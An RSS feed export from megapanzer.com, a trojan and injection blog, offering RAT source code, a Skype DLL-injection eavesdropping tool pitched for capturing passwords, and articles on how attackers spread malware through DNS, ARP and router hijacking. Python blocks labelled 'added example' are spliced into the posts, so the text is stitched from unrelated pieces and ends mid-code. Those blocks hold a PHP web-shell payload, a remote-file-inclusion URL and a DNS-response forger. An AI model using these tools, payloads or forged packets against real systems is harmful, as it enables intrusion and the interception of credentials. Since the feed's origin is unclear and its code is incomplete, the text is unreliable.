<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title> &#187; Injection</title>
	<atom:link href="http://www.megapanzer.com/tag/injection/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.megapanzer.com</link>
	<description></description>
	<lastBuildDate>Fri, 23 Dec 2011 13:02:33 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
		<item>
		<title>Things to do for the next days &#8230;</title>
		<link>http://www.megapanzer.com/2010/10/01/things-to-do-for-the-next-days/</link>
		<comments>http://www.megapanzer.com/2010/10/01/things-to-do-for-the-next-days/#comments</comments>
		<pubDate>Fri, 01 Oct 2010 11:27:33 +0000</pubDate>
		<dc:creator>carrumba</dc:creator>
				<category><![CDATA[Info]]></category>
		<category><![CDATA[Stuff]]></category>
		<category><![CDATA[DLL]]></category>
		<category><![CDATA[DLL injection]]></category>
		<category><![CDATA[Eavesdropping]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Skype]]></category>
		<category><![CDATA[skypetap]]></category>

		<guid isPermaLink="false">http://www.megapanzer.com/?p=4166</guid>
		<description><![CDATA[I&#8217;m still struggling to make SkypeTap (skype interception module) work on Win7. This week things just don&#8217;t go as smoothly as expected :/ As soon as I have a result (may it be positive or negative) I&#8217;ll let you know. If it works I think a further post would be appropriate that shows in detail [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.megapanzer.com/wp-content/uploads/trojan_horse.jpeg" alt="" title="trojanhorse" width="100" height="96" class="alignright size-full wp-image-2132" />I&#8217;m still struggling to make <strong>SkypeTap </strong>(skype interception module) work on Win7. This week things just don&#8217;t go as smoothly as expected :/ As soon as I have a result (may it be positive or negative) I&#8217;ll let you know.</p>
<p>If it works I think a further post would be appropriate that shows in detail how to inject <strong>*something*</strong> into a process and what different approaches exist to do that.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.megapanzer.com/2010/10/01/things-to-do-for-the-next-days/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Interesting PHP injection</title>
		<link>http://www.megapanzer.com/2010/09/02/interesting-php-injection/</link>
		<comments>http://www.megapanzer.com/2010/09/02/interesting-php-injection/#comments</comments>
		<pubDate>Thu, 02 Sep 2010 16:45:06 +0000</pubDate>
		<dc:creator>carrumba</dc:creator>
				<category><![CDATA[News & media]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://www.megapanzer.com/?p=3904</guid>
		<description><![CDATA[Read on Sans PHP injection attacks have become increasingly popular lately. If you look at your web server logs I’m pretty sure that you will find dozens of requests for PHP injection, usually by bots that are simply trying some well known (and less known) vulnerabilities. One of our readers, Blake, managed to capture some [...]]]></description>
			<content:encoded><![CDATA[<glossarycode><p><img src="http://www.megapanzer.com/wp-content/uploads/newspaper-150x150.jpg" alt="" title="newspaper" width="75" height="75" class="alignright size-thumbnail wp-image-2595" /><strong>Read on SANS</strong><br />
<br />
PHP injection attacks have become increasingly popular lately. If you look at your web server logs I’m pretty sure that you will find dozens of requests for PHP injection, usually by bots that are simply trying some well known (and less known) vulnerabilities.<br />
One of our readers, Blake, managed to capture some interesting attempts to <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=2563" title="Glossary: Exploit" target="_blank">exploit</a> various PHP injection vulnerabilities on his web site, thanks to the installation of mod_security. Contrary to popular PHP injection attempts, where the attacker tries to <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=2563" title="Glossary: Exploit" target="_blank">exploit</a> a variable to get the PHP interpreter to retrieve a remote PHP script, Blake noticed that the attacker tried to <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=2563" title="Glossary: Exploit" target="_blank">exploit</a> a vulnerability in a PHP script through a POST request. The attacker submitted a malicious PHP script (with other data) hoping that the PHP interpreter would execute it – this vulnerability also exists, although it is not that common. Here is what the attack looked like in the log files &#8230;</p>
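<p>As an added example (not from the SANS diary and not part of this post), here is a small Python classifier that tells the two attack styles described above apart: the common remote-file-inclusion attempt, where a GET parameter carries a URL the script is hoped to include(), and the POST variant Blake saw, where PHP source is submitted in the request body. The sample requests are constructed for the example; a mod_security audit log supplies the same three pieces (method, URI, body). The IP 203.0.113.9 and the paths are made up.</p>

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Style 1, the common one: a parameter whose value is itself a URL, hoping the
# script hands it to include()/require() so the interpreter fetches it.
# The trailing "?" makes the remote script's query string swallow whatever
# the vulnerable code appends to the path.
RFI_VALUE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Style 2: PHP source in the request itself, hoping the interpreter executes it.
# An opening tag, or the eval/base64_decode pair obfuscated web shells carry.
PHP_CODE = re.compile(r"<\?php|<\?=|\beval\s*\(|\bbase64_decode\s*\(", re.IGNORECASE)


def classify(method, url, body=""):
    """Return the attack classes found in one request; an empty list means clean."""
    findings = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:            # parse_qs already URL-decodes the values
            if RFI_VALUE.search(value):
                findings.append(f"rfi:{name}")
            if PHP_CODE.search(value):
                findings.append(f"php-code-in-query:{name}")
    # Bodies arrive form-encoded (%3C%3Fphp ...), so decode before matching.
    if method.upper() == "POST" and PHP_CODE.search(unquote_plus(body)):
        findings.append("php-code-in-body")
    return findings


# Constructed sample requests (not real log data).
SAMPLES = [
    ("GET", "/index.php?page=about", ""),
    ("GET", "/index.php?page=http://203.0.113.9/shell.txt?", ""),
    ("POST", "/wp-content/plugins/vuln/upload.php",
     "name=x&data=<?php eval(base64_decode($_POST['c'])); ?>"),
    ("POST", "/contact.php", "name=Bob&msg=hello+there"),
]


def scan(samples=SAMPLES):
    """Map (method, url) -> findings for every sample request."""
    return {(m, u): classify(m, u, b) for m, u, b in samples}


if __name__ == "__main__":
    for (m, u), hits in scan().items():
        print(m, u, "->", ", ".join(hits) or "clean")
```

<p>The RFI check keys on the value, not on the parameter name, because the bots try the same payload against dozens of parameter names; the body check decodes first, because the log will show the payload percent-encoded.</p>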
<p>Read more <a href="http://isc.sans.edu/diary.html?storyid=9478" target="_blank">here</a>.</p></glossarycode>]]></content:encoded>
			<wfw:commentRss>http://www.megapanzer.com/2010/09/02/interesting-php-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Trj/Casper.A sources.</title>
		<link>http://www.megapanzer.com/2010/02/15/trjcasper-a-sources/</link>
		<comments>http://www.megapanzer.com/2010/02/15/trjcasper-a-sources/#comments</comments>
		<pubDate>Mon, 15 Feb 2010 07:12:30 +0000</pubDate>
		<dc:creator>carrumba</dc:creator>
				<category><![CDATA[C]]></category>
		<category><![CDATA[RAT sources]]></category>
		<category><![CDATA[Tools & sources]]></category>
		<category><![CDATA[Casper]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[RAT]]></category>
		<category><![CDATA[source]]></category>
		<category><![CDATA[trojan]]></category>

		<guid isPermaLink="false">http://www.megapanzer.com/?p=3468</guid>
		<description><![CDATA[&#160; &#160; &#160; Name Trj.Casper &#160; Type RAT &#160; &#160; Author Unknown &#160; &#160; Written in C &#160; &#160; Description This sourcecode dates back to 2004. It is quite old and its functionality is rather limited. The intresting part in this source code is the injection section which represents the biggest part of it. It [...]]]></description>
			<content:encoded><![CDATA[<table border="0" width="100%">
<tbody>
<tr valign="top">
<td width="30%">&nbsp;</td>
<td width="50%">&nbsp;</td>
<td width="20%">&nbsp;</td>
</tr>
<tr valign="bottom">
<td><strong>Name</strong></td>
<td>Trj.Casper</td>
<td rowspan="5">
<img src="http://www.megapanzer.com/wp-content/uploads/trojan_horse.jpeg" alt="RAT" title="RAT" width="100" height="96" class="alignright size-full wp-image-2132" />
</td>
</tr>
<tr>
<td colspan="3">&nbsp;</td>
</tr>
<tr valign="bottom">
<td><strong>Type</strong></td>
<td>RAT</td>
<td>
&nbsp;
</td>
</tr>
<tr>
<td colspan="3">&nbsp;</td>
</tr>
<tr valign="bottom">
<td><strong>Author</strong></td>
<td>Unknown</td>
<td>
&nbsp;
</td>
</tr>
<tr>
<td colspan="3">&nbsp;</td>
</tr>
<tr valign="bottom">
<td><strong>Written in</strong></td>
<td>C</td>
<td>&nbsp;</td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
<tr valign="top">
<td><strong>Description</strong></td>
<td colspan="2">
This source code dates back to 2004. It is quite old and its functionality is rather limited. The interesting part of this source code is <strong>the injection section</strong>, which makes up the biggest part of it. It contains an injection function based on the <strong>CreateRemoteThread</strong> call and all the functions required to make the code run completely inside a remote process. You can use it as a basic example and extend it with your own functionality.
</td>
</tr>
<tr>
<td colspan="3">&nbsp;</td>
</tr>
<tr valign="top">
<td><strong>Questions</strong></td>
<td colspan="2">Do you have a question about this RAT/bot/worm? At the bottom of this post you find the box where you can type and send your message.</td>
</tr>
<tr>
<td colspan="3">&nbsp;</td>
</tr>
<tr valign="top">
<td><strong>Downloads</strong></td>
<td colspan="2"><a href="http://www.megapanzer.com/wp-content/uploads/casper.zip">Source</a></td>
</tr>
<tr>
<td colspan="3">&nbsp;</td>
</tr>
</tbody>
</table>
<p><br/></p>
]]></content:encoded>
			<wfw:commentRss>http://www.megapanzer.com/2010/02/15/trjcasper-a-sources/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Watching encrypted Skype traffic with SkypeDLLInjector</title>
		<link>http://www.megapanzer.com/2009/08/04/watching-encrypted-skype-traffic-with-skypedllinjector/</link>
		<comments>http://www.megapanzer.com/2009/08/04/watching-encrypted-skype-traffic-with-skypedllinjector/#comments</comments>
		<pubDate>Tue, 04 Aug 2009 12:30:22 +0000</pubDate>
		<dc:creator>carrumba</dc:creator>
				<category><![CDATA[Tools & sources]]></category>
		<category><![CDATA[DLL]]></category>
		<category><![CDATA[Eavesdropping]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Skype]]></category>

		<guid isPermaLink="false">http://www.megapanzer.com/?p=2471</guid>
		<description><![CDATA[Tool name : SkypeDLLInjector version 0.1 &#160; Description : SkypeDLLInjector is a tool to demonstrate how DLL injection works. In this proof of concept it is applied to the Skype application. It consists of a loader application which remains running in the background and a DLL which will be injected into every newly started program [...]]]></description>
			<content:encoded><![CDATA[<table border="0" width="100%">
<tbody>
<tr valign="top">
<td width="30%"></td>
<td width="70%"></td>
</tr>
<tr valign="top">
<td><strong>Tool name</strong> :</td>
<td>SkypeDLLInjector version 0.1</td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
<tr valign="top">
<td><strong>Description</strong> :</td>
<td>SkypeDLLInjector is a tool to demonstrate how DLL injection works. In this proof of concept it is applied to the Skype application. It consists of a loader application, which keeps running in the background, and a DLL, which is injected into every newly started program via a system-wide Windows hook.<br />
All this tool does is intercept the recv() and send() function calls to inspect the network data Skype is sending and receiving. Because Skype traffic is encrypted, only a small portion of the traffic is readable. But it could inspire you to create your own tools that eavesdrop on other calls to intercept sensitive data (the username and password, for example).
</td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
<tr valign="top">
<td><strong>Tested on</strong> :</td>
<td>Windows XP</td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
<tr>
<td><strong>Feedback</strong> :</td>
<td>In case you encounter any problems with the tool, you have suggestions to improve it, or you tested it with a Windows version I&#8217;ve not yet tested, please drop me an <a href="http://www.megapanzer.com/contact/">email</a>.</td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
<tr valign="top">
<td><strong>Downloads</strong> :</td>
<td><a href="http://www.megapanzer.com/wp-content/uploads/skypedllinjector_binary.zip">Binary</a> | <a href="http://www.megapanzer.com/wp-content/uploads/skypedllinjector_source.zip" target="_blank">Source</a></td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://www.megapanzer.com/2009/08/04/watching-encrypted-skype-traffic-with-skypedllinjector/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>DLL injection by modifying an executable file.</title>
		<link>http://www.megapanzer.com/2009/07/03/dll-injection-by/</link>
		<comments>http://www.megapanzer.com/2009/07/03/dll-injection-by/#comments</comments>
		<pubDate>Fri, 03 Jul 2009 16:43:53 +0000</pubDate>
		<dc:creator>carrumba</dc:creator>
				<category><![CDATA[Reading material]]></category>
		<category><![CDATA[DLL]]></category>
		<category><![CDATA[Infection]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[PE]]></category>

		<guid isPermaLink="false">http://www.megapanzer.com/?p=2236</guid>
		<description><![CDATA[This is a newer document from 2009 that explains DLL injection. Instead of the commonly used Windows hooking method for injecting a DLL into a running process, in this example the author modifies the binary itself so that the DLL is loaded when the executable file starts. Download it here.]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.megapanzer.com/wp-content/uploads/books-150x150.jpg" width="75" height="75" class="alignright size-thumbnail wp-image-2238" />This is a newer document from 2009 that explains DLL injection. Instead of the commonly used Windows hooking method for injecting a DLL into a running process, in this example the author modifies the binary itself so that the DLL is loaded when the executable file starts.<br />
<br />
Download it <a href="http://www.megapanzer.com/wp-content/uploads/pe-infection_by_dll_injection.pdf" target="_blank">here</a>.<br />
<br/></p>
]]></content:encoded>
			<wfw:commentRss>http://www.megapanzer.com/2009/07/03/dll-injection-by/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nine ways how hackers propagate malware (2 of 2)</title>
		<link>http://www.megapanzer.com/2009/05/06/nine_ways_how_hackers_propagate_malware_one/</link>
		<comments>http://www.megapanzer.com/2009/05/06/nine_ways_how_hackers_propagate_malware_one/#comments</comments>
		<pubDate>Wed, 06 May 2009 23:44:05 +0000</pubDate>
		<dc:creator>carrumba</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[MITM]]></category>
		<category><![CDATA[Proxy server]]></category>

		<guid isPermaLink="false">http://www.megapanzer.com/?p=942</guid>
		<description><![CDATA[In the first part of this series I wrote about the different ways attackers propagate malware by sending an infectious executable file or a USB memory stick to their victims or letting them pick up an infected file in a file sharing network like eMule or BitTorrent. In this article, as promised in the [...]]]></description>
			<content:encoded><![CDATA[<glossarycode><glossarycode><glossarycode><glossarycode><glossarycode><glossarycode><p><img src="http://www.megapanzer.com/wp-content/uploads/injection-150x150.jpg" alt="injection" title="injection" width="150" height="150" class="alignright size-thumbnail wp-image-1728" />In the <a href="http://www.megapanzer.com/2009/03/24/nine_ways_how_hackers_propagate_malware_one-2/">first part</a> of this series I wrote about the different ways attackers propagate <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a> by sending an infectious executable file or a USB memory stick to their victims, or by letting them pick up an infected file in a file sharing network like eMule or BitTorrent.<br />
In this article, as promised in the first part, I want to explain how to propagate and inject <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a> by taking over a victim&#8217;s data stream.<br />
<span id="more-942"></span><br />
There are two ways to take over a data stream: from inside the victim&#8217;s network (LAN) or from outside (the Internet). Both tactics have their advantages, disadvantages and ways to proceed, which I will explain in the following paragraphs. I won&#8217;t go too deep into the technical details; otherwise I would have to split this article into a second and a third part. I will explain the technical aspects in another article, independent of this series, and will add example tools and source code where possible.</p>
<p><strong>Attacking the victim&#8217;s home LAN</strong></p>
<p>Besides the fact that home Internet routers are generally less well protected than corporate Internet access appliances, one of the weak links in home routers is often the integrated wireless access point. Sometimes the routers are delivered with the WLAN module activated and protected only by the default settings. Other times the owner activates the WLAN himself and chooses a weak password or an insecure protection standard like <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1319" title="Glossary: WEP" target="_blank">WEP</a> (and nowadays <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1322" title="Glossary: WPA" target="_blank">WPA</a> has its weaknesses as well). If one of these preconditions is met, chances are good that an attacker will overcome the protection mechanisms. Once he is connected to the victim&#8217;s local network over the WLAN, several not too complicated scenarios exist to take over the data stream.</p>
<p><strong>Method 5 : Taking over the DNS</strong></p>
<p>The Internet doesn&#8217;t understand host names like www.megapanzer.com; it uses IP addresses like 194.208.66.33. Because we are too lazy to remember these unwieldy IP addresses and prefer meaningful host names, DNS maps between the two addressing conventions. Every time you want to connect to the megapanzer server www.megapanzer.com, your computer has to ask a DNS server under which IP address this server is reachable. It doesn&#8217;t take much imagination to see that taking over the DNS service in a victim&#8217;s LAN is the key to power. Once an attacker controls DNS, for example by injecting forged DNS responses, he controls where the data stream is directed. Traffic destined for ebanking.ubs.com can easily be redirected to the attacker&#8217;s server.</p>
<p><strong>Method 6 : Acting as default gateway</strong></p>
<p>The computers in an Ethernet-based LAN don&#8217;t deliver their frames to each other by IP address. IP addresses are used to route packets across the Internet, but inside a small, Ethernet-based home LAN the frames are delivered by MAC address. Every network adapter was assigned a unique MAC address by its manufacturer. The computers in a LAN constantly tell each other which MAC address belongs to which IP address (ARP), and they keep this information in memory for a while. WLAN adapters support the Ethernet standard too and therefore have MAC addresses as well. The only difference between wired and wireless network adapters is the medium they use (air or copper), the first layer of the OSI model; from layer 2 on they work exactly the same way.<br />
This allows an attacker to spread false information inside a LAN, telling every computer that HIS computer is the router that leads to the Internet. From then on every computer sends its packets to the attacker instead of the real Internet router. The attacker has taken over the data stream and can do with it whatever he wants: relay it, modify it, block it &#8230;</p>
<p>To give you an idea of how these two examples lead to a successful data injection, imagine you, as the victim, want to download an executable file via your browser. You click a link and expect the browser to download the file. An attacker can intercept your request and, instead of sending back the real executable, inject the <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1214" title="Glossary: Trojan horse" target="_blank">trojan horse</a>, disguised to look unsuspicious. Sceptics may object that you could check the <a class="glossaryLink" href="http://www.megapanzer.com/" title="Glossary: Hash" target="_blank">hash</a> checksum, but even they know that only a small percentage of users really does, and checksums are not always provided.</p>
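<p>As an added example, not part of the article, here is a Python sketch of what a forged DNS answer has to get right, and why method 5 (on the LAN) is so much easier than method 9 (cache poisoning from outside, described further below): a resolver trusts the first UDP answer whose 16-bit transaction ID and question match its outstanding query (plus, at the socket level, the source port). The attacker on the LAN has sniffed the query and simply copies the ID; the off-path attacker has to guess it. Only packet building and checking is shown, not the sniffing or sending. The host name, the transaction ID 0x1A2B and the address 203.0.113.66 are made up.</p>

```python
import struct


def encode_name(name):
    """Wire-format DNS name: length-prefixed labels, terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(packet, offset):
    """Return (name, offset after the name); follows compression pointers (0xC0xx)."""
    labels, end, jumped = [], None, False
    while True:
        length = packet[offset]
        if (length & 0xC0) == 0xC0:                     # pointer to an earlier name
            pointer = struct.unpack(">H", packet[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            offset, jumped = pointer, True
            continue
        offset += 1
        if length == 0:
            break
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset if end is None else end


def build_query(txid, name, qtype=1):
    """Standard recursive A query, as a stub resolver sends it."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)     # flags: RD
    return header + encode_name(name) + struct.pack(">HH", qtype, 1)


def build_response(txid, name, ip, ttl=300):
    """Answer claiming that name is at ip. A forger is free to choose txid and ip."""
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)     # flags: QR, RD, RA
    question = encode_name(name) + struct.pack(">HH", 1, 1)
    rdata = bytes(int(octet) for octet in ip.split("."))
    # 0xC00C: answer name is a pointer to the question name at offset 12
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse(packet):
    txid, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", packet[:12])
    offset, questions, answers = 12, [], []
    for _ in range(qdcount):
        name, offset = decode_name(packet, offset)
        qtype, _ = struct.unpack(">HH", packet[offset:offset + 4])
        offset += 4
        questions.append((name, qtype))
    for _ in range(ancount):
        name, offset = decode_name(packet, offset)
        rtype, _, _, rdlen = struct.unpack(">HHIH", packet[offset:offset + 10])
        offset += 10
        rdata, offset = packet[offset:offset + rdlen], offset + rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, ".".join(str(b) for b in rdata)))
    return {"txid": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def resolver_accepts(query, response):
    """What a resolver checks before trusting a UDP answer: transaction ID and
    question must match the outstanding query (the UDP source-port check happens
    at the socket and is not modelled here)."""
    q, r = parse(query), parse(response)
    return r["is_response"] and r["txid"] == q["txid"] and r["questions"] == q["questions"]


def lan_spoof(query, attacker_ip):
    """Method 5: the attacker on the LAN has sniffed the query, so the txid is known."""
    seen = parse(query)
    name, _ = seen["questions"][0]
    forged = build_response(seen["txid"], name, attacker_ip)
    return resolver_accepts(query, forged), parse(forged)["answers"]


def blind_poison(query, txid_guesses, attacker_ip):
    """Method 9: an off-path attacker never sees the query and must guess the txid.
    Returns how many of the forged answers would have been accepted."""
    name, _ = parse(query)["questions"][0]
    return sum(resolver_accepts(query, build_response(g, name, attacker_ip))
               for g in txid_guesses)


if __name__ == "__main__":
    q = build_query(0x1A2B, "ebanking.ubs.com")          # made-up txid and name
    print("on-path:", lan_spoof(q, "203.0.113.66"))
    print("off-path, 256 guesses:", blind_poison(q, range(0x1A00, 0x1B00), "203.0.113.66"))
```

<p>The on-path forgery is accepted on the first try; the off-path one is accepted once in 65536 guesses per query, and only if the source port is fixed as well. That gap is exactly what Kaminsky&#8217;s 2008 technique narrowed (many queries for random subdomains, each a fresh chance to win the race) and what source-port randomization widened again.</p>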
<p><strong>Method 7 : Intruding the victim&#8217;s Internet router</strong></p>
<p>As you saw in the previous examples, the Internet access router is the central point. Those attacks were conducted from the internal side of the network. There is also an external side, which attackers can reach and attack over the Internet.<br />
A large number of home Internet routers are still accessible from the Internet and offer a user interface for administration purposes, often over HTTP/HTTPS and also over Telnet and SSH. But private users are not known for having an IT security policy they have to respect. So you can think of several situations you may encounter when connecting to a home router:</p>
<ul>
<li>The admin interface access is blocked</li>
<li>The admin interface access is open but unprotected</li>
<li>The admin interface access is open and protected with the default account settings</li>
<li>The admin interface access is open and protected with a new password</li>
</ul>
<p>These situations invite an attacker to invest some time in cracking the password by a brute-force or <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1682" title="Glossary: Dictionary attack" target="_blank">dictionary attack</a>.<br />
Once this obstacle is overcome, the attacker controls the appliance, the place where all the data passes to and from the Internet. As an example of how the stream can be controlled by the attacker, think of the DNS service from the two previous examples: the attacker can configure the Internet router to redirect all DNS requests to a DNS server under his control.</p>
<p><strong>Method 8 : Anonymizing proxy server data injection</strong></p>
<p>Tor and I2P, to name the most famous among them, are quite popular anonymizing services. You install the proxy software on your computer, customize your browser a little, and you surf the net anonymously. But anonymizing services have one problem: when the data stream re-enters the regular Internet, you don&#8217;t know whether, and by whom, it is being read or maybe even manipulated.<br />
At least in open and anonymizing proxy chains it is an easy game to infiltrate other people&#8217;s data stream, read it, manipulate it and inject data they never requested (read <a href="http://www.megapanzer.com/2009/04/09/one-week-with-the-spammers-and-hackers-day-three/">here</a>).</p>
<p><strong>Method 9 : DNS cache poisoning</strong></p>
<p>I would consider DNS cache poisoning a rather esoteric method that maybe worked one day. But then I remember only too well when Dan Kaminsky discovered and published the DNS poisoning vulnerability. But as with TCP/IP spoofing, the Sendmail debug or CGI/PHF vulnerabilities, it just doesn&#8217;t happen anymore.</p>
<p>DNS cache poisoning is a technique to convince, for example, a big ISP&#8217;s DNS server, like the one of Bluewin (the biggest access provider in Switzerland), that a host name outside of their domain like ebanking.ubs.com is reachable under the IP address 192.168.1.1. Of course this is the wrong IP address, but all the Bluewin users who ask this DNS server for the IP address of ebanking.ubs.com will get this answer. By using DNS cache poisoning an attacker could redirect the data packets of the Bluewin users to a destination of his choice. He controls the stream.</p></glossarycode></glossarycode></glossarycode></glossarycode></glossarycode></glossarycode>]]></content:encoded>
			<wfw:commentRss>http://www.megapanzer.com/2009/05/06/nine_ways_how_hackers_propagate_malware_one/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nine ways how hackers propagate malware (1 of 2)</title>
		<link>http://www.megapanzer.com/2009/03/24/nine_ways_how_hackers_propagate_malware_one-2/</link>
		<comments>http://www.megapanzer.com/2009/03/24/nine_ways_how_hackers_propagate_malware_one-2/#comments</comments>
		<pubDate>Tue, 24 Mar 2009 13:01:11 +0000</pubDate>
		<dc:creator>carrumba</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Email]]></category>
		<category><![CDATA[Hackers]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[propagate]]></category>
		<category><![CDATA[Proxy server]]></category>

		<guid isPermaLink="false">http://www.megapanzer.com/?p=656</guid>
		<description><![CDATA[Malware propagation is one of the most fascinating parts of an attacker&#8217;s activities and, besides the anger of the affected people, it attracts the most attention. It is the part where all the magic of infection and intrusion happens, where attackers release their malicious software into the wild and try to infect new victim systems [...]]]></description>
			<content:encoded><![CDATA[<glossarycode><glossarycode><glossarycode><glossarycode><p><a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">Malware</a> propagation is one of the most fascinating parts of an attacker&#8217;s activities and, besides the anger of the affected people, it attracts the most attention. It is the part where all the magic of infection and intrusion happens, where attackers release their malicious software into the wild and try to infect new victim systems as quickly or as selectively as possible; their victims are left wondering how the heck that could have happened.<br />
<span id="more-656"></span><br />
The goal of this article is to give you an overview of how and where attackers release <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a>. It shows the common infection points where people first come into contact with <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a> and what action has to be executed to initiate the infection process.</p>
<p><strong>Method 1 :  Sending the <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1214" title="Glossary: Trojan horse" target="_blank">Trojan horse</a> as email attachment</strong><img class="alignright size-full wp-image-949" src="http://www.megapanzer.com/wp-content/uploads/email.jpg" alt="email" width="112" height="74" /></p>
<p>One of the oldest but still very effective ways people get infected is via email, by opening an attached file. Email is the most used way people communicate over the Internet. Almost everyone owns an email address and uses it regularly. It is easy to use and accessible from anywhere with Internet access. Today, most email services are free, too.</p>
<p>As already mentioned, sending <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a> as an email attachment was a propagation method in the early days already. The attacker prepared the <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1214" title="Glossary: Trojan horse" target="_blank">Trojan horse</a>, sent it to all the recipients on his list and waited until the infected systems connected back. Simple and straightforward. The only thing the recipient (the victim) had to do was double-click the attachment to initiate the infection process. Back then anti-virus software was not as widespread as it is nowadays, and people were not as cautious and sensitised to this kind of threat. Many email users were only a double-click away from infection.<br />
Today, with AV software installed on virtually every computer and people aware of the threat, this way of propagation still works surprisingly well, although things have become slightly more difficult. AV software no longer accepts *.exe, *.com, *.bat or *.pif attachments, and it also checks archives like *.zip or *.rar files for executable files. If they contain files with suspicious file name extensions, it raises a warning and interrupts the execution. But because there is still a big mass of potential victims among email users who obstinately ignore any kind of warning, the infection rate is still high, and for an attacker this archaic means is still promising and valuable.</p>
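<p>As an added example, not part of the article, here is the kind of attachment check described above in Python: it refuses the extensions the article lists (plus .scr and .cmd, an addition of this example), it looks at the first bytes so that a renamed executable (a PE behind a .jpg name) is caught as well, and it opens zip archives, including nested ones, with a size cap so that a zip bomb cannot be used to stall the check. The sample attachment is constructed in the code, not a real capture.</p>

```python
import io
import os
import zipfile

# Extensions named in the article, plus .scr and .cmd (an assumption of this example).
EXEC_EXTENSIONS = {".exe", ".com", ".bat", ".pif", ".scr", ".cmd"}
MAX_MEMBER_BYTES = 5 * 1024 * 1024   # refuse to inflate anything bigger (zip-bomb guard)
MAX_DEPTH = 3                        # zip inside zip inside zip is enough


def flag_attachment(name, data, depth=0):
    """Return the reasons this attachment would be refused; an empty list means it passes.
    Checks the extension (so invoice.pdf.exe is caught), the first bytes (so a PE
    renamed to .jpg is caught) and recurses into zip archives."""
    reasons = []
    ext = os.path.splitext(name.lower())[1]
    if ext in EXEC_EXTENSIONS:
        reasons.append(f"{name}: executable extension {ext}")
    elif data[:2] == b"MZ":                       # DOS/PE header under another name
        reasons.append(f"{name}: PE header behind a harmless-looking extension")
    if data[:4] == b"PK\x03\x04":                 # local file header of a zip archive
        if depth >= MAX_DEPTH:
            reasons.append(f"{name}: archive nested too deeply to inspect")
            return reasons
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                member = f"{name}/{info.filename}"
                if info.file_size > MAX_MEMBER_BYTES:
                    reasons.append(f"{member}: too large to inspect")
                    continue
                reasons.extend(flag_attachment(member, zf.read(info), depth + 1))
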